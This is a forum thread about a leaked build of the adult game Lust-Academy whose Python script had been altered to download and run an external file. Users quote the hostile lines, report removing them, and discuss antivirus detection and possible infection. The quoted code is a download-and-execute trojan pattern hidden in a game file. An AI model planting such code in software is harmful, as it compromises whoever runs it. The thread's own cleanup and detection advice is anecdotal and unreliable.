So that is why it was using bandwidth after I tried to launch it but nothing happened. interesting. I ofc scanned it with my anti virus but it didnt report anything badI got the latest version working under Linux by commenting out some lines in Lust-Academy.py. It downloads a file from an external location that seemingly isn't needed by the game itself. Just open up the file with any text editor and comment out or remove the following lines (from line 188 onward):
# Download and execute the file
file_url = 'You must be registered to see the links'
local_file_path = os.path.join(renpy_base, 'renpy', 'downloaded_file')
print(f"Attempting to download file from {file_url} to {local_file_path}")
if download_file(file_url, local_file_path):
run_file(local_file_path)
else:
print("")
After removing those lines the game started up normally.
Where did the upload come from?S3 v3.9.1d files removed. Please scan your system if you downloaded it.
It had a modified script that will download and execute a file.
From a leaker here. (who is now banned). All virus scans show nothing until you actually run the code. And Antivirs don't do that. Thats gonna be pain to contain if it happens more often. Please be carefull people. Im currently uploading a clean version.Where did the upload come from?
Windows Defender detected it with no problemsSo what AVs are people running that actually caught this thing? Kaspersky apparently didn't. Which is incredibly fucking annoying since I literally just set this PC up yesterday so I'm unsure as to whether it's already infected or not.
By the way does the new version have any sort of changelog aside from "oh boy we added x number of scenes!"? It'd be nice to know who actually has progress and if it's worth bothering.
Which Kaspersky turns off. That's just fucking lovely.Windows Defender detected it with no problems
Just look at the posts of the guy whose name you copiedWhat was the infection and what damage did it do?
I don't know. As far as I can tell, nothing, but since others are reporting their AVs are deleting the .exe and blocking it and that it apparently had a script to download something I'm surprised and annoyed my AV was apparently blind to it. That or I got lucky and the virus itself didn't "go off" for some reason.What was the infection and what damage did it do?
WtfWhat was the infection and what damage did it do?
Oh dear. I am fucked! My AV never detected it and I've been playing the game since that download was releasedWtf
Not sure about the Dmg though. As I never let the file finish downloading or executing.
Enable windows defender and try scanning with that.Oh dear. I am fucked! My AV never detected it and I've been playing the game since that download was released
First check the game files of the version inside the /game folder Also check task manager for a tast that says "download something".Oh dear. I am fucked! My AV never detected it and I've been playing the game since that download was released